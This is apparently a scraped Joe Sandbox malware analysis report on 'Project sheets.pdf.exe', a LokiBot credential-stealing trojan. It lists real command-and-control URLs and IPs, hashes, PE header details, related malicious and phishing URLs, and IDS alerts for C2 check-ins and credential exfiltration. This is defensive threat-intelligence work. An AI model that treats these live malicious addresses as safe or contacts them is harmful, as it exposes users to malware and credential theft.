                3.2.cvtres.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                3.0.cvtres.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                3.0.cvtres.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                3.0.cvtres.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                3.0.cvtres.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://tixfilmz.gq/Devil/PWS/fre.php100%Avira URL Cloudmalware
                https://tixfilmz.gq/Devil/PWS/fre.php0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                tixfilmz.gq
                188.114.97.3
                truetrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  http://kbfvzoboss.bid/alien/fre.phptrue
                  • URL Reputation: safe
                  unknown
                  http://alphastand.win/alien/fre.phptrue
                  • URL Reputation: safe
                  unknown
                  http://alphastand.trade/alien/fre.phptrue
                  • URL Reputation: safe
                  unknown
                  http://alphastand.top/alien/fre.phptrue
                  • URL Reputation: safe
                  unknown
                  http://tixfilmz.gq/Devil/PWS/fre.phptrue
                  • Avira URL Cloud: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.ibsensoftware.com/cvtres.exe, cvtres.exe, 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://tixfilmz.gq/Devil/PWS/fre.phpcvtres.exe, 00000003.00000002.500737023.000000000049F000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  188.114.97.3
                  tixfilmz.gqEuropean Union
                  13335CLOUDFLARENETUStrue
                  188.114.96.3
                  unknownEuropean Union
                  13335CLOUDFLARENETUStrue
                  IP
                  192.168.2.1
                  Joe Sandbox Version:35.0.0 Citrine
                  Analysis ID:682148
                  Start date and time:2022-08-11 06:41:08 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 5m 44s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:Project sheets.pdf.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:29
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@7/3@74/3
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 97.9% (good quality ratio 93.9%)
                  • Quality average: 76.9%
                  • Quality standard deviation: 28.6%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 62
                  • Number of non-executed functions: 17
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Adjust boot time
                  • Enable AMSI
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                  • Excluded IPs from analysis (whitelisted): 23.211.6.115
                  • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  TimeTypeDescription
                  06:42:14API Interceptor71x Sleep call for process: cvtres.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  188.114.97.3Civil-Engineering-Co_77Q95QP0.exeGet hashmaliciousBrowse
                  • idtetangede.cf/new/net_api
                  TR0627729920002.exeGet hashmaliciousBrowse
                  • www.trisuaka.xyz/uj3c/?aN68=XPUturKxIt&r4S0P=hHj17NHgKPiZmEi8MiFWNXc7sAIIGTvllA8De7wxS98Or+mtFTkVcIIMQhr+SfcB3JVi
                  SecuriteInfo.com.Exploit.CVE-2017-0199.02.Gen.27968.xlsxGet hashmaliciousBrowse
                  • xhvbzueifhdbjdfywete4y8va.cf/BN6/fre.php
                  PFI_RF5030_page-0001.exeGet hashmaliciousBrowse
                  • www.housewivesgonemad.com/fn9h/?3f=9rVX&iPvP4jt=ddRw5MT1wOjY3Kvw782dffYcLJJU3vKCW0wjqGHMHu5whXbe6A3I1ePAl3/zhcZ3XyulnlOEfMfjw01CWWKFH8v+7ClvUbBgIA==
                  DT5a7gQIfc.exeGet hashmaliciousBrowse
                  • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN5/fre.php
                  SecuriteInfo.com.IL.Trojan.MSILZilla.22206.21605.exeGet hashmaliciousBrowse
                  • www.yottatic.com/s4s9/?yjXXebZ=jEbUE/ixKAejIpqrb+hPhCZIEd2TtHWa5Vsjvuo2FdOv5NgX/fUtfpaCm/HodT+HivIY&jx=k8vP10IHTxqLB
                  OVERDUE STATEMENT.exeGet hashmaliciousBrowse
                  • www.true-bonanza.space/v8h0/?q2Jt0=GXSxAXaXor&7n=GcaHbmni5g0jw8MxGZX36ce6KF3k/i9sbD+WsBHK+AAmFNQpdLGXUk+/9DF8EZW1ewB/NLWxhg==
                  n3MzXXD85s.exeGet hashmaliciousBrowse
                  • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN5/fre.php
                  q5gmz4tF6F.exeGet hashmaliciousBrowse
                  • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN5/fre.php
                  CgFJBVFNlg.exeGet hashmaliciousBrowse
                  • www.showmyipaddress.com/
                  IvAeW7TNgd.exeGet hashmaliciousBrowse
                  • atomic-wallet.net/marsword/gate.php
                  http://valdia.quatiappcn.pwGet hashmaliciousBrowse
                  • valdia.quatiappcn.pw/favicon.ico
                  Invoice SIL-EDI-0-2022-392.exeGet hashmaliciousBrowse
                  • www.housewivesgonemad.com/fn9h/?0B=YPsXr&u2M=ddRw5MT1wOjY3Kvw7NbVcfUKPJErgeKCW0wjqGHMHu5whXbe6A3I1ezAl3/zhcZ3XyulnlOEfMfjw01CWWKFQtbIugd4U4x8Iw==
                  vbc.exeGet hashmaliciousBrowse
                  • www.aliensrent.com/gg5z/?e2MxDFO=7ZJ0JFkS6yiiZRblKk03y80/vQHx/IHNV7U5OWPtWhU6OpoCT2rWNv+5g/bA7gKMqTzwgUEOlQ1jL2NCVqOEjnydD8ezGI550Q==&5jlLU=C6Al
                  MV. PACIFIC CARRIER.docxGet hashmaliciousBrowse
                  • rotf.tk/vr64
                  MV. PACIFIC CARRIER.docxGet hashmaliciousBrowse
                  • rotf.tk/vr64
                  Zahlung.exeGet hashmaliciousBrowse
                  • www.rotate-mech.com/nt19/?3fcLnF=yiXn7oWziuHB8i/5vkh2BMRAg6laGmyiofwD3MYzyWCMQQu089U4cSYKGNKEj1LwCbwr&g2J=t6St0PnpMpH4SHk
                  sH52jEJvY9.exeGet hashmaliciousBrowse
                  • tixfilmz.tk/PWS/fre.php
                  SecuriteInfo.com.W32.AIDetectNet.01.461.exeGet hashmaliciousBrowse
                  • tixfilmz.tk/PWS/fre.php
                  product_list_95849.exeGet hashmaliciousBrowse
                  • www.kawkawtogel.org/jrut/?fBL42jSX=RTG6JFWhvNEJHJcZzyAxO8AV4S95btP/ignN5ZZu/FeIwtNl+qlDBU7Axum4PBZQVTq7womZmXNJO4n3xD2pW8EcaT8VJEA+oA==&ERqXj=D48hW0
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  CLOUDFLARENETUSSecuriteInfo.com.W32.AIDetectNet.01.18072.exeGet hashmaliciousBrowse
                  • 104.18.115.97
                  Doc11245.htmGet hashmaliciousBrowse
                  • 104.18.10.207
                  https://lemissaire.tg/L0ck/Get hashmaliciousBrowse
                  • 104.17.25.14
                  https://764827.selcdn.ru/share-point/sharepoint.html#ruth.harris@ashurst.comGet hashmaliciousBrowse
                  • 104.17.24.14
                  https://invitee.notion.site/SAMCO-SALES-INC-facf804e29d14b018ace2c0ab9caf6ceGet hashmaliciousBrowse
                  • 172.64.154.162
                  https://www.heroflooring.com/yopilesterer/peuvibed/dsendaremar/fixcder/x5I0r2/hello@yourdumb.com.auGet hashmaliciousBrowse
                  • 104.21.53.35
                  https://indd.adobe.com/view/17d80112-3e5d-425d-adc1-a2d9ede7ebb2Get hashmaliciousBrowse
                  • 104.17.24.14
                  https://smartsourcellc.nimbusweb.me/share/7407459/h1uk7p1mhlvcwzcpkw5fGet hashmaliciousBrowse
                  • 104.16.126.175
                  http://promitattoos.com/Get hashmaliciousBrowse
                  • 188.114.97.3
                  https://issuu.com/kdcocument/docs/09878675456789809?fr=sMjg4MDUyNzIxNDIGet hashmaliciousBrowse
                  • 104.17.24.14
                  http://kingfaisalprize.org/Get hashmaliciousBrowse
                  • 104.26.7.42
                  https://www.paperturn-view.com/?pid=MjY264454&v=1.1Get hashmaliciousBrowse
                  • 104.16.107.139
                  http://recp.mkt51.net/ctt?m=27097482&r=NzgzMjA3MzI5NTYxS0&j=MjI0NDQyMzQ1NgS2&b=3&mt=1&rt=0&kx=1&kt=12&k=ShopName&kd=https://Gcgaming.digibuyers.ir/ber/?e=c2hhd24uZHVuY2FuQGdjZ2FtaW5nLmNvbQ==Get hashmaliciousBrowse
                  • 104.18.11.207
                  https://www.paperturn-view.com/?pid=MjY264735&v=1.1Get hashmaliciousBrowse
                  • 104.17.25.14
                  maldoc.htmlGet hashmaliciousBrowse
                  • 104.17.25.14
                  #U260e#Ufe0f New Payment Request.htmGet hashmaliciousBrowse
                  • 188.114.96.3
                  https://app.getresponse.com/click.html?x=a62b&lc=SNTQlu&mc=It&s=BIUpUo1&u=wkqNo&z=Ey5btDo&Get hashmaliciousBrowse
                  • 188.114.97.3
                  injector.exeGet hashmaliciousBrowse
                  • 162.159.134.233
                  modest-menu.exeGet hashmaliciousBrowse
                  • 188.114.97.3
                  ACH_WIRE REMITTANCE.xlsxGet hashmaliciousBrowse
                  • 172.67.74.85
                  CLOUDFLARENETUSSecuriteInfo.com.W32.AIDetectNet.01.18072.exeGet hashmaliciousBrowse
                  • 104.18.115.97
                  Doc11245.htmGet hashmaliciousBrowse
                  • 104.18.10.207
                  https://lemissaire.tg/L0ck/Get hashmaliciousBrowse
                  • 104.17.25.14
                  https://764827.selcdn.ru/share-point/sharepoint.html#ruth.harris@ashurst.comGet hashmaliciousBrowse
                  • 104.17.24.14
                  https://invitee.notion.site/SAMCO-SALES-INC-facf804e29d14b018ace2c0ab9caf6ceGet hashmaliciousBrowse
                  • 172.64.154.162
                  https://www.heroflooring.com/yopilesterer/peuvibed/dsendaremar/fixcder/x5I0r2/hello@yourdumb.com.auGet hashmaliciousBrowse
                  • 104.21.53.35
                  https://indd.adobe.com/view/17d80112-3e5d-425d-adc1-a2d9ede7ebb2Get hashmaliciousBrowse
                  • 104.17.24.14
                  https://smartsourcellc.nimbusweb.me/share/7407459/h1uk7p1mhlvcwzcpkw5fGet hashmaliciousBrowse
                  • 104.16.126.175
                  http://promitattoos.com/Get hashmaliciousBrowse
                  • 188.114.97.3
                  https://issuu.com/kdcocument/docs/09878675456789809?fr=sMjg4MDUyNzIxNDIGet hashmaliciousBrowse
                  • 104.17.24.14
                  http://kingfaisalprize.org/Get hashmaliciousBrowse
                  • 104.26.7.42
                  https://www.paperturn-view.com/?pid=MjY264454&v=1.1Get hashmaliciousBrowse
                  • 104.16.107.139
                  http://recp.mkt51.net/ctt?m=27097482&r=NzgzMjA3MzI5NTYxS0&j=MjI0NDQyMzQ1NgS2&b=3&mt=1&rt=0&kx=1&kt=12&k=ShopName&kd=https://Gcgaming.digibuyers.ir/ber/?e=c2hhd24uZHVuY2FuQGdjZ2FtaW5nLmNvbQ==Get hashmaliciousBrowse
                  • 104.18.11.207
                  https://www.paperturn-view.com/?pid=MjY264735&v=1.1Get hashmaliciousBrowse
                  • 104.17.25.14
                  maldoc.htmlGet hashmaliciousBrowse
                  • 104.17.25.14
                  #U260e#Ufe0f New Payment Request.htmGet hashmaliciousBrowse
                  • 188.114.96.3
                  https://app.getresponse.com/click.html?x=a62b&lc=SNTQlu&mc=It&s=BIUpUo1&u=wkqNo&z=Ey5btDo&Get hashmaliciousBrowse
                  • 188.114.97.3
                  injector.exeGet hashmaliciousBrowse
                  • 162.159.134.233
                  modest-menu.exeGet hashmaliciousBrowse
                  • 188.114.97.3
                  ACH_WIRE REMITTANCE.xlsxGet hashmaliciousBrowse
                  • 172.67.74.85
                  No context
                  No context
                  Process:C:\Users\user\Desktop\Project sheets.pdf.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):226
                  Entropy (8bit):5.3467126928258955
                  Encrypted:false
                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                  MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                  SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                  SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                  SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                  Malicious:true
                  Reputation:moderate, very likely benign file
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:1
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):46
                  Entropy (8bit):1.0424600748477153
                  Encrypted:false
                  SSDEEP:3:/lbON:u
                  MD5:89CA7E02D8B79ED50986F098D5686EC9
                  SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
                  SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
                  SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:........................................user.
                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):7.523144496622303
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  • Win32 Executable (generic) a (10002005/4) 49.97%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  • DOS Executable Generic (2002/1) 0.01%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:Project sheets.pdf.exe
                  File size:177696
                  MD5:b9ff215d1d69d1a6d7568eecc3ecd245
                  SHA1:6f17bbed238dc4571db8b43fad392c6ef3b88fa5
                  SHA256:c06061604c0d1be02e69e00ada53ceb9e2d5ba9d47f93fc20cafa149513a12e1
                  SHA512:36c74d69a70f9faad528b5f91aa89ed040ac03a515121258b680188ba499322797e2103e7fa30464b0e823fe5df14d2d71cdd190ff67d5bab2d0aaeee47c2aa7
                  SSDEEP:3072:QZiMlRrtGIepA7NKAs+fgobpWxuHAXTDlnD0y/Bv1vzuJJyL:QZiMzhGIeUhs5otWxugxgy/Bv1vzuJ
                  TLSH:4C045B9D366035CFC95BD9729AA81C24EA2034BB530BC253A09725ADCE4DAD7CF191F3
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b@.b..............0..^...........|... ........@.. ..............................DJ....`................................
                  Icon Hash:92aca8b2b2a2b286
                  Entrypoint:0x427c2e
                  Entrypoint Section:.text
                  Digitally signed:true
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Time Stamp:0x62F44062 [Wed Aug 10 23:33:54 2022 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                  Signature Valid:false
                  Signature Issuer:CN=DigiCert High Assurance Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US
                  Signature Validation Error:The digital signature of the object did not verify
                  Error Number:-2146869232
                  Not Before, Not After
                  • 10/29/2013 5:00:00 PM 1/4/2017 4:00:00 AM
                  Subject Chain
                  • CN=Wen Jia Liu, O=Wen Jia Liu, L=Sydney, S=New South Wales, C=AU
                  Version:3
                  Thumbprint MD5:FB7AAB26B203432685FBC0FF17F24045
                  Thumbprint SHA-1:32387AEC09EB287F202E98398189B460F4C61A0D
                  Thumbprint SHA-256:E0E85619EEF45FCE4421E4BA581060E43BBBF25911CD757DD081DA425DD1DB51
                  Serial:0FF1EF66BD621C65B74B4DE41425717F
                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x27bd40x57.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x280000x19c8.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x27c000x3a20
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2a0000xc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x27b900x1c.text
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x20000x25c340x25e00False0.80277949669967data7.534046578744168IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rsrc0x280000x19c80x1a00False0.3330829326923077data5.2485738132687745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x2a0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountry
                  RT_ICON0x281680x10a8data
                  RT_ICON0x292100x468GLS_BINARY_LSB_FIRST
                  RT_GROUP_ICON0x296780x22data
                  RT_VERSION0x2969c0x32cdata
                  DLLImport
                  mscoree.dll_CorExeMain
                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  192.168.2.3188.114.97.349852802025381 08/11/22-06:43:38.361573TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349817802021641 08/11/22-06:43:11.901228TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349782802825766 08/11/22-06:42:50.570997TCP2825766ETPRO TROJAN LokiBot Checkin M24978280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349786802024313 08/11/22-06:42:53.219319TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349805802024318 08/11/22-06:43:09.287221TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349823802024313 08/11/22-06:43:13.321407TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349885802021641 08/11/22-06:43:55.376397TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988580192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349753802024318 08/11/22-06:42:25.207102TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349760802024318 08/11/22-06:42:32.923604TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976080192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349754802025381 08/11/22-06:42:26.308314TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349805802024313 08/11/22-06:43:09.287221TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349884802825766 08/11/22-06:43:54.330408TCP2825766ETPRO TROJAN LokiBot Checkin M24988480192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349760802024313 08/11/22-06:42:32.923604TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349888802024313 08/11/22-06:44:00.133246TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988880192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349798802021641 08/11/22-06:43:06.576803TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349838802024313 08/11/22-06:43:24.421881TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349750802021641 08/11/22-06:42:21.832277TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349895802825766 08/11/22-06:44:06.157277TCP2825766ETPRO TROJAN LokiBot Checkin M24989580192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349744802021641 08/11/22-06:42:15.052087TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349797802825766 08/11/22-06:43:05.379365TCP2825766ETPRO TROJAN LokiBot Checkin M24979780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349743802024312 08/11/22-06:42:14.045456TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349790802025381 08/11/22-06:42:56.651534TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349830802021641 08/11/22-06:43:16.837786TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349838802024318 08/11/22-06:43:24.421881TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349867802025381 08/11/22-06:43:45.824252TCP2025381ET TROJAN LokiBot Checkin4986780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349796802024318 08/11/22-06:43:04.193279TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349796802024313 08/11/22-06:43:04.193279TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349853802021641 08/11/22-06:43:40.660156TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349890802825766 08/11/22-06:44:03.457387TCP2825766ETPRO TROJAN LokiBot Checkin M24989080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349758802024318 08/11/22-06:42:30.656105TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349761802024313 08/11/22-06:42:34.002289TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349758802024313 08/11/22-06:42:30.656105TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349778802024318 08/11/22-06:42:46.945645TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349867802825766 08/11/22-06:43:45.824252TCP2825766ETPRO TROJAN LokiBot Checkin M24986780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349761802024318 08/11/22-06:42:34.002289TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.3188.114.97.3
